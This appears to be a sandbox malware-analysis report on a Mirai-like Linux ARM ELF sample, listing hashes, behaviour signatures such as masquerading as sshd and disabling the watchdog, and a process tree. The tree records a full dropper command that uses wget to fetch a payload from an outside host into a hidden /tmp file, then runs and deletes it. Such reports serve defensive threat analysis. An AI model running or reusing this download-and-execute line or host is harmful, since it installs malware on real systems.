Analysis
max time kernel: 147s
max time network: 138s
platform: debian-9_armhf
resource: debian9-armhf-20240226-en
resource tags: arch:armhf, image:debian9-armhf-20240226-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 02/04/2024, 01:18

Behavioral task: behavioral1
Sample: a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf
Resource: debian9-armhf-20240226-en
General
Target: a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf
Size: 139KB
MD5: c161f9d73ca2e53a130680b762579df5
SHA1: ff2830f335be7d73692dff80072c46d9a244576b
SHA256: a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a
SHA512: 4b2ccdeb1b2e4235c175f4ef1a4054fd2c3449b03fdaa55c85fa92b2efefd68eb37b7c64222d3a43aefbbcefabf6ba487898b2a6931c67df1e2caf1462040269
SSDEEP: 3072:Z41HOuaGVV3NfHUOjqyldqCw3jkmhxQwoVZUNu:Ze3aGVVdqyldq1jkmhxQwoVZUNu
Malware Config
Signatures

Changes its process name (1 IoC)
  description: Changes the process name, possibly in an attempt to hide itself
  ioc: sshd
  pid: 669
  Process: a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf

Executes dropped EXE (1 IoC)
  ioc: /tmp/.....
  pid: 689
  Process: .....

Modifies Watchdog functionality (1 TTP, 2 IoCs)
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description: File opened for modification; ioc: /dev/misc/watchdog
  description: File opened for modification; ioc: /dev/watchdog

Reads system routing table (1 TTP, 1 IoC)
Gets active network interfaces from the /proc virtual filesystem.
  description: File opened for reading; ioc: /proc/net/route; Process: a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf

Reads system network configuration (1 TTP, 1 IoC)
Uses contents of the /proc filesystem to enumerate network settings.
  description: File opened for reading; ioc: /proc/net/route; Process: a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf

Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
  description: File opened for modification; ioc: /tmp/.....; Process: wget
Processes (tree; indentation shows parent/child depth)

/tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf
  command: /tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf
  PID: 669
  - Changes its process name
  - Reads system routing table
  - Reads system network configuration

  /bin/sh
    command: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
    PID: 670

    /usr/bin/wget
      command: wget -q http://gay.energy/.../vivid -O .....
      PID: 674
      - Writes file to tmp directory

    /bin/chmod
      command: chmod 777 .....
      PID: 687

    /tmp/.....
      command: ./.....
      PID: 689
      - Executes dropped EXE

    /bin/sh
      command: /bin/sh ./.....
      PID: 689

    /bin/rm
      command: rm -rf .....
      PID: 693